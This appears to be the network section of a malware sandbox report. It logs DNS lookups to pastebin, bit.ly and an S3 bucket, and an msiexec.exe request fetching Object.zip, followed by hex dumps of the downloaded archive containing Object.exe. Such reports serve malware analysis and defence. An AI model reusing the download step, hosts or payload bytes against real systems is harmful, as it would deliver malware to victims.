                                                                                              Dec 14, 2021 00:57:44.638179064 CET49793443192.168.2.3104.23.98.190
                                                                                              Dec 14, 2021 00:57:44.638205051 CET44349793104.23.98.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:44.638784885 CET44349793104.23.98.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:44.639367104 CET49793443192.168.2.3104.23.98.190
                                                                                              Dec 14, 2021 00:57:44.677639008 CET44349793104.23.98.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:44.677793980 CET44349793104.23.98.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:44.677958965 CET49793443192.168.2.3104.23.98.190
                                                                                              Dec 14, 2021 00:57:44.683588982 CET49793443192.168.2.3104.23.98.190
                                                                                              Dec 14, 2021 00:57:44.683620930 CET44349793104.23.98.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:50.767441988 CET49794443192.168.2.3172.217.168.36
                                                                                              Dec 14, 2021 00:57:50.767498016 CET44349794172.217.168.36192.168.2.3
                                                                                              Dec 14, 2021 00:57:50.767599106 CET49794443192.168.2.3172.217.168.36
                                                                                              Dec 14, 2021 00:57:50.771292925 CET49794443192.168.2.3172.217.168.36
                                                                                              Dec 14, 2021 00:57:50.771369934 CET44349794172.217.168.36192.168.2.3
                                                                                              Dec 14, 2021 00:57:50.771436930 CET49794443192.168.2.3172.217.168.36
                                                                                              Dec 14, 2021 00:57:52.660053015 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.660100937 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.660203934 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.660903931 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.660926104 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.700609922 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.700788975 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.705219984 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.705682039 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.707138062 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.738774061 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.738902092 CET44349796104.23.99.190192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.740391016 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.741343975 CET49796443192.168.2.3104.23.99.190
                                                                                              Dec 14, 2021 00:57:52.741367102 CET44349796104.23.99.190192.168.2.3

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 14, 2021 00:57:09.329979897 CET5600953192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:09.350703001 CET53560098.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:25.890496016 CET5902653192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:25.908885002 CET53590268.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:28.013889074 CET6082353192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:28.033987045 CET53608238.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:29.769738913 CET5510253192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:29.787564039 CET53551028.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:30.944396973 CET5623653192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:30.962265015 CET53562368.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:31.786308050 CET5652753192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:31.807813883 CET53565278.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:32.243194103 CET5265053192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:32.264575005 CET53526508.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:32.384501934 CET5836153192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:32.388443947 CET5361553192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:32.405011892 CET53583618.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:32.407320023 CET53536158.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:37.968807936 CET5072853192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:37.984766960 CET53507288.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:42.655894041 CET5377753192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:42.672300100 CET53537778.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:44.560739994 CET5710653192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:44.581908941 CET53571068.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:50.732471943 CET6035253192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:50.751409054 CET53603528.8.8.8192.168.2.3
                                                                                              Dec 14, 2021 00:57:52.637762070 CET6098253192.168.2.38.8.8.8
                                                                                              Dec 14, 2021 00:57:52.658278942 CET53609828.8.8.8192.168.2.3

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Dec 14, 2021 00:57:09.329979897 CET192.168.2.38.8.8.80x25c4Standard query (0)procuradoriageral.s3.us-east-2.amazonaws.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:25.890496016 CET192.168.2.38.8.8.80x266cStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:28.013889074 CET192.168.2.38.8.8.80xd1e9Standard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:29.769738913 CET192.168.2.38.8.8.80x5a02Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:30.944396973 CET192.168.2.38.8.8.80x9f92Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:31.786308050 CET192.168.2.38.8.8.80xc919Standard query (0)websetnet.netA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.243194103 CET192.168.2.38.8.8.80xa224Standard query (0)cdn.statically.ioA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.384501934 CET192.168.2.38.8.8.80x61b1Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.388443947 CET192.168.2.38.8.8.80xe300Standard query (0)tdns5.gtranslate.netA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:37.968807936 CET192.168.2.38.8.8.80x6d65Standard query (0)mc.yandex.ruA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:42.655894041 CET192.168.2.38.8.8.80xefddStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:44.560739994 CET192.168.2.38.8.8.80x6d73Standard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:50.732471943 CET192.168.2.38.8.8.80x76fbStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:52.637762070 CET192.168.2.38.8.8.80xf0e0Standard query (0)pastebin.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Dec 14, 2021 00:57:09.350703001 CET8.8.8.8192.168.2.30x25c4No error (0)procuradoriageral.s3.us-east-2.amazonaws.coms3-r-w.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:09.350703001 CET8.8.8.8192.168.2.30x25c4No error (0)s3-r-w.us-east-2.amazonaws.com52.219.96.48A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:25.908885002 CET8.8.8.8192.168.2.30x266cNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:28.033987045 CET8.8.8.8192.168.2.30xd1e9No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:28.033987045 CET8.8.8.8192.168.2.30xd1e9No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:29.787564039 CET8.8.8.8192.168.2.30x5a02No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:29.787564039 CET8.8.8.8192.168.2.30x5a02No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:30.962265015 CET8.8.8.8192.168.2.30x9f92No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:30.962265015 CET8.8.8.8192.168.2.30x9f92No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:31.807813883 CET8.8.8.8192.168.2.30xc919No error (0)websetnet.net104.26.9.138A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:31.807813883 CET8.8.8.8192.168.2.30xc919No error (0)websetnet.net104.26.8.138A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:31.807813883 CET8.8.8.8192.168.2.30xc919No error (0)websetnet.net172.67.71.90A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.264575005 CET8.8.8.8192.168.2.30xa224No error (0)cdn.statically.iocloudflare.staticallydns.comCNAME (Canonical name)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.264575005 CET8.8.8.8192.168.2.30xa224No error (0)cloudflare.staticallydns.com104.16.18.94A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.264575005 CET8.8.8.8192.168.2.30xa224No error (0)cloudflare.staticallydns.com104.16.19.94A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.405011892 CET8.8.8.8192.168.2.30x61b1No error (0)static.cloudflareinsights.com104.16.94.65A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.405011892 CET8.8.8.8192.168.2.30x61b1No error (0)static.cloudflareinsights.com104.16.95.65A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.407320023 CET8.8.8.8192.168.2.30xe300No error (0)tdns5.gtranslate.net172.67.159.235A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:32.407320023 CET8.8.8.8192.168.2.30xe300No error (0)tdns5.gtranslate.net104.21.50.93A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:37.984766960 CET8.8.8.8192.168.2.30x6d65No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:37.984766960 CET8.8.8.8192.168.2.30x6d65No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:37.984766960 CET8.8.8.8192.168.2.30x6d65No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:37.984766960 CET8.8.8.8192.168.2.30x6d65No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:42.672300100 CET8.8.8.8192.168.2.30xefddNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:44.581908941 CET8.8.8.8192.168.2.30x6d73No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:44.581908941 CET8.8.8.8192.168.2.30x6d73No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:50.751409054 CET8.8.8.8192.168.2.30x76fbNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:52.658278942 CET8.8.8.8192.168.2.30xf0e0No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                              Dec 14, 2021 00:57:52.658278942 CET8.8.8.8192.168.2.30xf0e0No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • procuradoriageral.s3.us-east-2.amazonaws.com
                                                                                              • pastebin.com
                                                                                              • bit.ly
                                                                                              • websetnet.net
                                                                                              • https:
                                                                                                • cdn.statically.io
                                                                                                • static.cloudflareinsights.com
                                                                                                • tdns5.gtranslate.net
                                                                                                • mc.yandex.ru

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.34975252.219.96.48443C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:09 UTC0OUTGET /Object.zip HTTP/1.1
                                                                                              Accept: */*
                                                                                              User-Agent: AdvancedInstaller
                                                                                              Host: procuradoriageral.s3.us-east-2.amazonaws.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2021-12-13 23:57:10 UTC0INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: 1jOxLq6h3M+TMnoJY7D0uStL4eS2kg0MQwvMXXQfEX+G6PagI1ueadB+wwKCOM22Kqn57iF4iZQ=
                                                                                              x-amz-request-id: 1AYRN94BSM0TGTTN
                                                                                              Date: Mon, 13 Dec 2021 23:57:11 GMT
                                                                                              Last-Modified: Wed, 08 Dec 2021 02:41:03 GMT
                                                                                              ETag: "505f30f0dc5db5515870d49b8a058c27"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: application/zip
                                                                                              Server: AmazonS3
                                                                                              Content-Length: 8280101
                                                                                              Connection: close
                                                                                              2021-12-13 23:57:10 UTC0INData Raw: 50 4b 03 04 14 00 00 00 08 00 60 2b 89 4b f5 0a 6c a6 e8 b2 07 00 f0 99 13 00 0a 00 00 00 4f 62 6a 65 63 74 2e 65 78 65 ec 9b 71 54 5b 55 9e c7 2f 34 29 69 49 4b 68 53 8d 35 da 38 cd 2a 56 ec a4 ca ac ec 11 35 b4 3c ca 54 90 20 94 d6 91 d8 54 63 fb 8a d8 c6 36 58 1c 3b 4a 85 ce 10 2f 28 75 70 a4 16 57 5c 58 07 67 18 c5 91 b5 8d 07 35 5a 4e a1 6e c7 05 97 b1 ec 1c ce 88 3b 8c 3e 35 b3 1b 15 95 56 34 7b 7f bf 9b c7 7b 69 48 e5 ac 9b ff 36 e7 c0 83 f7 fd de cf fb fe 7e ef e6 be 97 f6 51 f4 93 66 32 8f 10 a2 61 5f e1 30 21 47 09 7f d9 c9 77 bf 32 92 08 59 bc e2 95 c5 a4 77 c1 1f 2e 39 9a 54 f8 87 4b ca c4 1d 7b 2c 9e dd bb b6 ef de 7a b7 e5 8e ad 3b 77 ee f2 5a 6e bf d3 b2 bb 7a a7 65 c7 4e 4b 5e 71 a9 e5 ee 5d ee 3b 57 2f 5a b4 d0 1a 61 8c 9c f9 aa ae f9 f0
                                                                                              Data Ascii: PK`+KlObject.exeqT[U/4)iIKhS58*V5<T Tc6X;J/(upW\Xg5ZNn;>5V4{{iH6~Qf2a_0!Gw2Yw.9TK{,z;wZnzeNK^q];W/Za
                                                                                              2021-12-13 23:57:10 UTC16INData Raw: cd dc f2 76 0a 5e 89 da 9a 73 3e b2 33 a1 d2 18 ec 3b cd 1e 15 45 65 5d ed 19 43 4f 0e 93 75 75 e9 98 f6 39 c8 86 21 2d 69 1c 15 49 a4 71 2d c9 a3 23 8d a0 db 25 d2 88 96 f4 5d 1d 69 14 5d f9 8c 92 46 b5 a4 6f e8 48 57 d0 7f 49 a4 2b 5a 12 42 a2 58 1d 7a 1e 62 26 74 18 9b 85 cf 21 ee 42 03 a9 e4 1c 02 37 74 9a 9e 43 e4 87 7a e9 39 4f f8 f4 1c 62 4f d4 41 ce 2b 1a d0 bf a6 6a 9e 08 79 b6 21 8f 74 d5 6d da ab 3e 83 a4 1d 86 8a 36 2f e7 cf c0 b7 09 54 81 d5 0e df 21 98 82 f0 10 a5 98 15 4e 48 7b 0c 59 6e e4 54 d8 3b 65 f6 5d 89 d9 b7 29 ec 76 99 3d 86 12 b2 d1 05 99 bd 4f 66 bf 9d 98 fd db 0b da 26 ed 40 cf 0e 51 e3 3a b4 c6 bd a8 23 1d 40 cb 24 d2 01 2d a9 fe 02 b4 7b c5 41 b4 2e 45 db 5e 61 f4 d7 12 3b ac 65 3b 30 3b 54 da 0d 23 cd 73 4e 5b 7b 2f fa 02 51
                                                                                              Data Ascii: v^s>3;Ee]COuu9!-iIq-#%]i]FoHWI+ZBXzb&t!B7tCz9ObOA+jy!tm>6/T!NH{YnT;e])v=Of&@Q:#@$-{A.E^a;e;0;T#sN[{/Q
                                                                                              2021-12-13 23:57:10 UTC32INData Raw: e6 55 83 9f a5 9d 54 c1 2d e4 b9 da a1 cd 13 fe 91 3c e3 58 7c 1d 6e 21 bf 3c 07 93 4a e9 c5 64 31 97 ed a6 22 99 06 21 4d 16 e3 42 f7 51 51 4e 98 1c b1 a4 5d 4e 64 4d 9c 70 be 7c 28 ab d1 a3 ad 0e 6f 5f 0f a5 7d 67 af c3 c6 55 dc 87 07 04 bf ae 99 a7 6c c5 72 b6 85 08 57 ec 41 f8 49 f2 bc 2a 4d 70 e6 00 eb 3f c5 f7 88 28 f3 56 33 8d cc 5b ba 0b 3f 3e 1e c3 bb aa de 89 dc ff 36 95 c5 be dc 95 36 e6 74 d6 1c 6d f2 e6 e8 c9 21 f2 c9 11 23 1f 1c 6b 38 f4 62 bb b7 20 4c bf 63 04 af 78 5e 8c 47 81 66 01 0e ac 3b 52 71 57 fa de 31 5d 99 2f ed 81 f9 22 36 82 e5 ff 9a 28 cb 95 d6 24 b2 2d 4b da 55 e3 5e 27 ef c1 d0 fc 24 c1 91 58 bf 1e 85 4e 13 de 17 ac 76 3e 7a 36 ba 5b af 7e dc 78 3c b9 4d a2 17 b6 18 ba 45 8d 7d bc be 13 b1 f4 8b e2 fd c7 6d e1 31 54 3f f9 2f
                                                                                              Data Ascii: UT-<X|n!<Jd1"!MBQQN]NdMp|(o_}gUlrWAI*Mp?(V3[?>66tm!#k8b Lcx^Gf;RqW1]/"6($-KU^'$XNv>z6[~x<ME}m1T?/
                                                                                              2021-12-13 23:57:10 UTC33INData Raw: 52 17 77 ff 6e 37 8d dc 90 3e cc 57 2f 16 b4 51 26 10 e6 ef 65 ae 68 57 1d 65 02 69 8a cc 04 d2 14 92 09 84 bc f2 d6 96 2e 2a ca d8 cd 3c 43 3c 27 90 32 8a 31 0e a3 29 d5 60 c7 b5 28 73 4a 9e 7b 9d b8 52 1b df 89 37 8b 63 c9 e5 77 4a ed 76 16 90 72 2a dc a5 f7 ea ae c0 84 c4 01 39 f3 00 5e 3a 6b 83 03 83 13 26 f1 06 fa 9e c8 f6 20 f8 70 72 36 cd 64 cf ec 69 c3 df 31 bf a3 27 cf 2c 1d cc 24 19 32 e0 69 20 37 8d 45 27 5e 83 74 d6 84 2a a7 54 90 46 e6 f4 08 c4 33 b6 ab e8 af 61 21 fe 78 cf 7c 58 fb 7c f5 d6 06 a1 50 69 49 43 88 fe 6a 08 d1 5f cc ae 38 3e 96 eb 2f 52 5e 93 ed 19 fb d9 01 24 ef fc 47 1b 43 79 35 e3 54 ff 78 47 e8 54 1f 79 83 a2 bc 9a 55 a7 f2 9a 57 75 11 6f c1 d8 c2 ae 95 d7 9e 10 e5 95 de a8 28 af 4b e5 41 e5 35 e4 bf a2 95 d7 4e 6a 7e 8b 74
                                                                                              Data Ascii: Rwn7>W/Q&ehWei.*<C<'21)`(sJ{R7cwJvr*9^:k& pr6di1',$2i 7E'^t*TF3a!x|X|PiICj_8>/R^$GCy5TxGTyUWuo(KA5Nj~t
                                                                                              2021-12-13 23:57:10 UTC49INData Raw: 6d a7 7d 99 f4 c6 0a 7c 83 24 5e 4c 46 1e 1c 34 94 07 7c e1 70 57 e1 c9 bd c7 25 59 39 dc 7d 5c c9 52 ea 3a 87 25 ee b8 ae 42 3a a2 53 b0 64 4a fd 2f 7f 21 2b f8 c4 3c 9d 3a c9 91 00 0f 83 81 bc 04 31 64 fe 3b 21 41 56 52 81 78 ed 6d b1 12 96 52 fc 99 9f c7 f1 f7 0c 27 dc 0e 0b 96 85 60 25 b3 4f 3a 57 e5 a7 23 e5 11 ea 12 a6 60 21 f0 40 a9 b8 af 05 a1 70 5e 33 91 12 1c 11 60 6f e2 f7 a9 c4 93 02 e4 00 ab e3 40 8e 6d c6 57 02 76 ac fa 9a f9 f4 1a ba 0d 60 f6 db 99 5a 22 18 c6 b9 43 d1 82 e1 c6 16 51 30 28 e2 2c 8e 85 3e c1 fe 46 56 ad e1 fe 46 83 01 7f 38 71 07 99 30 60 f9 b9 80 8f 4e 59 59 ba 29 0b df e1 8b 87 bb 8a 95 9e 33 45 d3 8c d5 b4 19 8b e3 f4 9c 44 f9 78 5f 37 a8 df 78 c9 1f 93 68 12 c0 bc 3c 3d f3 46 3e 4c e5 77 53 0e bf 1b f5 77 47 04 d9 fb 4e
                                                                                              Data Ascii: m}|$^LF4|pW%Y9}\R:%B:SdJ/!+<:1d;!AVRxmR'`%O:W#`!@p^3`o@mWv`Z"CQ0(,>FVF8q0`NYY)3EDx_7xh<=F>LwSwGN
                                                                                              2021-12-13 23:57:10 UTC50INData Raw: 30 bd 91 cc 5d 34 53 98 f0 59 57 49 9e 98 60 8f 95 d2 86 95 e4 8b 57 d2 e4 2b 13 c5 2b e0 08 6a 02 af 57 49 79 03 1f 51 8e ce f1 78 02 7d 6d 11 99 b1 79 ae c6 c3 80 08 6e 6b 7f 70 36 c8 3c 78 8a 3c c2 89 5e 26 d2 90 51 8f d9 a9 46 e1 78 d7 a5 32 17 b7 f8 96 ba 6d df d0 70 b5 2b ec 64 ba 1e 41 ce 27 df 4f a6 68 0e 7e ff c4 4b 7e 5b 34 48 23 63 20 91 5e 6b 14 97 d7 8d 36 f6 12 15 20 4b 43 87 89 45 c7 14 83 0e 0d 64 b1 c8 71 20 36 e7 f6 e9 e2 0b dc 32 10 11 fd a6 b3 31 dc 24 fa 0a 36 b8 b3 68 05 f9 6d 85 a0 b4 ca 15 4a a0 c8 b6 3f 55 14 31 9d ee 16 91 c0 c4 99 84 03 a3 e0 77 a8 57 7a 84 43 79 f8 11 a2 4a 5c d3 9a a1 5d 8f af 89 d7 1f c5 d7 93 37 a4 78 d8 b6 d2 75 b2 4e af d2 33 11 5a 4f 17 e2 26 7f 13 a2 0f 05 0d 1f 7a dc 4b 1e 52 e6 be 14 ba 4a 40 30 53 87
                                                                                              Data Ascii: 0]4SYWI`W++jWIyQx}mynkp6<x<^&QFx2mp+dA'Oh~K~[4H#c ^k6 KCEdq 621$6hmJ?U1wWzCyJ\]7xuN3ZO&zKRJ@0S
                                                                                              2021-12-13 23:57:10 UTC66INData Raw: 94 f9 b0 99 7c f2 6e 0a bd 71 af 08 70 10 99 c3 5e c3 0f 5b 0a af 6d bc 99 b4 68 71 fc 6a 10 ff 2d d7 0a bb 9d 25 ed 61 9b d3 4b 8f c3 00 f8 2b 74 b5 08 8b 9b 43 8b b4 8b 6d 65 05 43 e9 10 1e 79 6a d1 24 04 3b b4 4d 2e cf dd d6 37 be 9f 30 e0 bb 01 6d e2 11 65 bd 18 a4 5a 87 8f 5c 25 b9 30 72 0b 76 8c d4 6c 2f 52 df 31 b1 e8 fa e0 c1 1e 15 69 4b 48 26 2c af 23 7e ae b4 d8 e7 a8 2d 13 51 65 1c 5f fa 26 d9 ff 93 d7 00 e0 66 fd f0 b4 3f 39 04 41 2f 08 f0 3e 14 04 90 9c 9e d3 e4 28 b1 6a f5 00 de 3a 66 15 42 a3 c3 0b 1d 08 7e 08 7d 54 ea 23 1b b3 1a 3b d3 bc be 52 3a fb 7d e0 43 22 b8 df 87 7d 5a e6 23 92 b9 24 01 56 8f 03 65 a6 9d 00 6f aa e0 04 9c 34 81 73 92 ee 14 de 99 03 bc 33 94 0e 37 8a d0 02 b0 00 b2 4d dc c4 b9 58 3a e7 61 fa 53 76 1e 1d 12 8c f1 b9
                                                                                              Data Ascii: |nqp^[mhqj-%aK+tCmeCyj$;M.70meZ\%0rvl/R1iKH&,#~-Qe_&f?9A/>(j:fB~}T#;R:}C"}Z#$Veo4s37MX:aSv
                                                                                              2021-12-13 23:57:10 UTC67INData Raw: 9f ec 80 8b 1a bb 5c b1 89 7e 04 3f 27 3d 21 c6 47 b0 27 75 8a 03 0f d7 a0 0f f7 52 e2 70 2d 47 93 86 93 76 00 3a 62 3e 3a b6 5e 57 6d 29 59 2a ca fa cd 61 af c6 37 a5 e2 27 21 c7 c8 93 f5 7a 8e 91 c4 eb 5f 02 7d 5c bc 9c 40 1f ea 3c 79 52 17 b5 23 77 bc 23 a8 10 c2 eb 47 67 e0 0a 3b 4c d9 5e 9f f0 11 88 bd 1b e6 6d 01 84 b0 bd 30 2d 15 b4 24 fe 16 9c 2d 04 80 4b 4e f0 b7 0e 4b 22 cd 75 47 0c 9e 1f 79 52 f5 8d a9 4d 96 f2 26 a1 db 93 dc 24 79 ff 65 be ea a1 e4 8c 92 0b b9 4c aa 45 d2 c3 df 95 7a 55 e3 f1 28 b8 a1 a6 d6 ee 36 fc 1e 62 9f ee e4 f0 ad 4f 1d fc d4 61 ce c5 b3 a0 b6 5b b5 6c 17 50 29 93 e7 ad de 90 da f6 0d b5 ad a0 c8 fa b5 a3 4c c9 9d 0c 5e 23 e9 03 5e 8d aa 1f e7 3d ce ca 62 04 e7 cd d2 08 4e 3a ac 11 5c 76 1b f7 e6 c8 06 5e f6 c5 36 41 d0
                                                                                              Data Ascii: \~?'=!G'uRp-Gv:b>:^Wm)Y*a7'!z_}\@<yR#w#Gg;L^m0-$-KNK"uGyRM&$yeLEzU(6bOa[lP)L^#^=bN:\v^6A
                                                                                              2021-12-13 23:57:10 UTC83INData Raw: b8 3e 3a e6 9a 1e 4a c1 5c 1e 37 2a 7d d9 30 46 e8 72 d3 a1 db ab 42 77 6d 66 06 74 3b af 8d 0e 5d f7 cc 34 12 93 86 3f 7a ce 42 be 5f 44 23 b8 0f 52 18 8b 41 e7 2d e5 af 1f 23 9c 05 e9 70 0e a8 70 fa 33 e1 ec bf 3a 3a 9c 45 33 55 75 17 c2 0a de a1 79 e9 e0 aa f5 eb 66 43 dd 84 c6 0e eb 74 de 41 59 1d a6 47 b5 08 72 d5 00 1f 94 a7 2b f2 ab 95 59 f2 c0 12 0d a5 37 74 5c 11 7c a2 7d 5a d4 49 ac 04 80 76 7e 45 16 0d c5 4a 33 7f 57 a7 0c 31 2d fe b1 94 99 cb f4 01 d1 d4 c7 b3 22 2a 53 7c c1 4a cd 87 17 b3 87 83 14 00 d9 57 27 50 2f e5 97 ca 3e ea b7 c3 71 55 3a 8e 1d 0f 2a 38 fe a2 24 03 c7 ad 57 28 8e b7 8e 8c e3 e3 ac 81 d0 c2 a7 d7 ad 48 ae 57 c5 97 08 68 50 70 8c 6b e0 07 2a 7c 6b 29 68 c7 42 2a 7c de 4c f8 ce 5d 1e 7d 0d 14 96 a4 ac 55 1b 97 42 0f d7 8d
                                                                                              Data Ascii: >:J\7*}0FrBwmft;]4?zB_D#RA-#pp3::E3UuyfCtAYGr+Y7t\|}ZIv~EJ3W1-"*S|JW'P/>qU:*8$W(HWhPpk*|k)hB*|L]}UB
                                                                                              2021-12-13 23:57:10 UTC84INData Raw: b9 ec 26 7c 87 e3 e0 b3 fc 0d 49 8a d7 d9 64 e5 0d b8 f9 25 74 68 24 b1 88 e6 4f a1 98 69 3e 6f 44 6d cd 8c e7 24 49 16 01 43 8d e2 07 b7 72 14 11 30 a1 e5 10 99 26 7f 02 3c 94 cf 52 49 64 1e 40 a5 e9 44 07 44 ba 21 c8 4d cf 58 67 b5 f7 cb e4 c5 e2 bc 12 2a 1f 31 95 46 63 76 cb 3c d6 72 db c2 b7 5d 74 5d 08 2d a5 e1 39 cd 93 a4 7c ce 54 c7 35 ed e8 d8 3c 8d d4 95 92 ed 67 d9 4a ca 23 95 73 99 bf dd f8 5d db cf a1 1b 75 98 2f ef 18 34 a2 31 68 67 75 d9 fe b3 cc 8f c4 0d 7e 24 f0 3d 36 a4 78 1f 36 73 b2 95 5d b6 ae 1f 03 71 f3 68 1f f8 90 ec 5f 23 d1 33 1e 9c 4c 6c 37 00 69 79 f2 b2 6e 1e 1f 0c 4d 87 a3 d9 22 be f0 b9 1e 0a 02 82 1e cd 3d a0 e8 93 83 30 7d 71 b7 05 6a 25 07 e1 4d 90 c3 d9 3a d1 3d 20 2e da 92 d4 da 87 2d 9a e7 c2 92 bd a8 34 4b 9b 9a 54 0a
                                                                                              Data Ascii: &|Id%th$Oi>oDm$ICr0&<RId@DD!MXg*1Fcv<r]t]-9|T5<gJ#s]u/41hgu~$=6x6s]qh_#3Ll7iynM"=0}qj%M:= .-4KT
